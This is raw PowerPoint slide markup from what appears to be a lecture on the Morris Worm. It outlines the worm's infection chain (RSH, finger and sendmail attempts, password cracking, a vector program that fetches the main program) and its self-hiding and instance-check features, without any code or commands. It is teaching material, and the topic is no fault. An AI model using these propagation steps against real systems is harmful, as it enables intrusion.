                  <a:xfrm>
                    <a:off x="8210257" y="3426272"/>
                    <a:ext cx="1793718" cy="720550"/>
                  </a:xfrm>
                  <a:prstGeom prst="curvedUpArrow">
                    <a:avLst>
                      <a:gd name="adj1" fmla="val 40000"/>
                      <a:gd name="adj2" fmla="val 93008"/>
                      <a:gd name="adj3" fmla="val 25000"/>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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="Pfeil: nach rechts 35"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4624701" y="3519661"/>
                <a:ext cx="3171463" cy="277793"/>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7" name="Rechteck 36"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5284258" y="4879932"/>
                <a:ext cx="1983673"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User/Password/Hosts</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>User1/</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>abc</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>/Host A, Host B</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>…</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>…</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="38" name="Gerade Verbindung mit Pfeil 37"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="39" idx="3"/>
                <a:endCxn id="37" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4790596" y="5230925"/>
                <a:ext cx="493663" cy="54993"/>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pic>
          <p:nvPicPr>
            <p:cNvPr id="30" name="Grafik 29"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7811868" y="2872265"/>
              <a:ext cx="1506716" cy="1968186"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="31" name="Gruppieren 30"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4590550" y="3865454"/>
              <a:ext cx="6608453" cy="1766704"/>
              <a:chOff x="4476250" y="3460336"/>
              <a:chExt cx="6608453" cy="1766704"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="33" name="Textfeld 32"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7697567" y="4403745"/>
                <a:ext cx="3387136" cy="823295"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="003366"/>
              </a:solidFill>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="500" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003366"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>4. </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0"/>
                  <a:t>Transfer and execute vector program, which re-connects to server and transfer the main-program</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34" name="Pfeil: nach rechts 33"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="10800000">
                <a:off x="4476250" y="3460336"/>
                <a:ext cx="3171463" cy="27779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grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1001627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Morris Worm: Main-Program Initiation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269421" y="1193506"/>
            <a:ext cx="11585122" cy="4929502"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For each object files, the worm tries to build an executable object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sun 3 binary version of the worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>VAX version of the worm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If one of the files successfully executed, the worm close the connection to the victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Otherwise it clears away all evidence of the attempt at infection</a:t>
            </a:r>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21</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Gruppieren 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3626074" y="3924473"/>
            <a:ext cx="4939852" cy="1384995"/>
            <a:chOff x="8356922" y="4480368"/>
            <a:chExt cx="3655044" cy="1384995"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Rechteck 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8356922" y="4480369"/>
              <a:ext cx="3599049" cy="5549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27" name="Textfeld 26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8356922" y="4480368"/>
              <a:ext cx="3599049" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                  <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                </a:rPr>
                <a:t>ü</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Textfeld 27"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8866208" y="4480368"/>
              <a:ext cx="3145758" cy="1384995"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2800" dirty="0"/>
                <a:t>Victim machine is infected!</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Gruppieren 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9518687" y="78043"/>
            <a:ext cx="2491200" cy="943335"/>
            <a:chOff x="318444" y="1887083"/>
            <a:chExt cx="11221235" cy="3882150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Textfeld 29"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="318444" y="3253205"/>
              <a:ext cx="2488554" cy="949954"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="003366"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="500" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0"/>
                <a:t>Gather information about network interfaces (incl. reachability tests)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="31" name="Grafik 30"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3005659" y="2873782"/>
              <a:ext cx="1599701" cy="1915513"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rechteck 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1426352" y="1887083"/>
              <a:ext cx="1733537"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List of Target Machines</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Host A</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>…</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>…</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="33" name="Verbinder: gewinkelt 32"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="32" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000" flipH="1" flipV="1">
              <a:off x="709388" y="2536244"/>
              <a:ext cx="960139" cy="473789"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">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4" name="Gruppieren 33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3159884" y="1891281"/>
              <a:ext cx="4636280" cy="1399141"/>
              <a:chOff x="3159884" y="1891281"/>
              <a:chExt cx="4636280" cy="1399141"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="49" name="Gruppieren 48"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4613700" y="1891281"/>
                <a:ext cx="3182464" cy="1399141"/>
                <a:chOff x="4476250" y="1520888"/>
                <a:chExt cx="3182464" cy="1399141"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="51" name="Textfeld 50"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4560252" y="1520888"/>
                  <a:ext cx="3071495" cy="823296"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square" rtlCol="0">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="003366"/>
                      </a:solidFill>
                    </a:rPr>
                    <a:t>2. </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>Infection attempts: </a:t>
                  </a:r>
                  <a:br>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                  </a:br>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>(1.) RSH, (2.) Finger, (3.) </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0" err="1"/>
                    <a:t>Sendmail</a:t>
                  </a:r>
                  <a:endParaRPr lang="en-US" sz="200" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="52" name="Pfeil: nach rechts 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4476250" y="2642236"/>
                  <a:ext cx="3182464" cy="277793"/>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dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="50" name="Gerade Verbindung mit Pfeil 49"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="32" idx="3"/>
                <a:endCxn id="51" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3159884" y="2293071"/>
                <a:ext cx="1537816" cy="9860"/>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5" name="Gruppieren 34"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1319949" y="3519661"/>
              <a:ext cx="6476215" cy="2249572"/>
              <a:chOff x="1319949" y="3519661"/>
              <a:chExt cx="6476215" cy="2249572"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="41" name="Gruppieren 40"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1319949" y="4692617"/>
                <a:ext cx="3470649" cy="1076616"/>
                <a:chOff x="1876855" y="4558974"/>
                <a:chExt cx="3470649" cy="1076616"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="45" name="Textfeld 44"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1876855" y="4558974"/>
                  <a:ext cx="3470649" cy="1076616"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="square" rtlCol="0">
                  <a:spAutoFit/>
                </a:bodyPr>
                <a:lstStyle/>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" sz="500" dirty="0">
                      <a:solidFill>
                        <a:srgbClr val="003366"/>
                      </a:solidFill>
                    </a:rPr>
                    <a:t>3. </a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>Collect information about </a:t>
                  </a:r>
                  <a:br>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                  </a:br>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>users and hosts, try to break </a:t>
                  </a:r>
                  <a:br>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                  </a:br>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>password, try to connect to</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:r>
                    <a:rPr lang="en-US" sz="200" dirty="0"/>
                    <a:t>Victims with login-data</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="46" name="Gruppieren 45"/>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="4560252" y="4917314"/>
                  <a:ext cx="610484" cy="487857"/>
                  <a:chOff x="8000117" y="2650708"/>
                  <a:chExt cx="2003858" cy="1496114"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="47" name="Pfeil: nach oben gekrümmt 46"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm rot="10800000">
                    <a:off x="8000117" y="2650708"/>
                    <a:ext cx="1793718" cy="720550"/>
                  </a:xfrm>
                  <a:prstGeom prst="curvedUpArrow">
                    <a:avLst>
                      <a:gd name="adj1" fmla="val 40000"/>
                      <a:gd name="adj2" fmla="val 93008"/>
                      <a:gd name="adj3" fmla="val 25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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="48" name="Pfeil: nach oben gekrümmt 47"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="8210257" y="3426272"/>
                    <a:ext cx="1793718" cy="720550"/>
                  </a:xfrm>
                  <a:prstGeom prst="curvedUpArrow">
                    <a:avLst>
                      <a:gd name="adj1" fmla="val 40000"/>
                      <a:gd name="adj2" fmla="val 93008"/>
                      <a:gd name="adj3" fmla="val 25000"/>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solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="42" name="Pfeil: nach rechts 41"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4624701" y="3519661"/>
                <a:ext cx="3171463" cy="277793"/>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3" name="Rechteck 42"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5284258" y="4879932"/>
                <a:ext cx="1983673"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User/Password/Hosts</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>User1/</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>abc</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>/Host A, Host B</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>…</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>…</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="44" name="Gerade Verbindung mit Pfeil 43"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="45" idx="3"/>
                <a:endCxn id="43" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4790596" y="5230925"/>
                <a:ext cx="493663" cy="54993"/>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pic>
          <p:nvPicPr>
            <p:cNvPr id="36" name="Grafik 35"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7811868" y="2872265"/>
              <a:ext cx="1506716" cy="1968186"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="37" name="Gruppieren 36"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4590550" y="3865454"/>
              <a:ext cx="6608453" cy="1766704"/>
              <a:chOff x="4476250" y="3460336"/>
              <a:chExt cx="6608453" cy="1766704"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Textfeld 38"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7697567" y="4403745"/>
                <a:ext cx="3387136" cy="823295"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln>
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="500" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="003366"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>4. </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="200" dirty="0"/>
                  <a:t>Transfer and execute vector program, which re-connects to server and transfer the main-program</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="40" name="Pfeil: nach rechts 39"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="10800000">
                <a:off x="4476250" y="3460336"/>
                <a:ext cx="3171463" cy="27779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grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Textfeld 37"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9738655" y="3023379"/>
              <a:ext cx="1801024" cy="1076616"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="003366"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="003366"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="500" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003366"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>5. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0"/>
                <a:t>Main-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0" err="1"/>
                <a:t>ProgramInstantiation</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0"/>
                <a:t> and </a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="200" dirty="0"/>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="200" dirty="0"/>
                <a:t>“hiding itself “</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="260739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Morris Worm: Main-Program Features</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Inhaltsplatzhalter 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269421" y="1193506"/>
            <a:ext cx="11585122" cy="4929502"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check if there is any other instance of the worm running on this machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connecting to a local, predetermined TCP socket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If connection succeeded one of the worms (randomly) set its “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pleasequit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” variable to 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The worm exit after breaking user passwords with own dictionary (not immediately, delay of exit) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Self-Check” failed when server load is too high</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		Often multiple versions of the worm running on the same machine</a:t>
            </a:r>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22</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grpSp>
        <p:nvGrpSpPr>
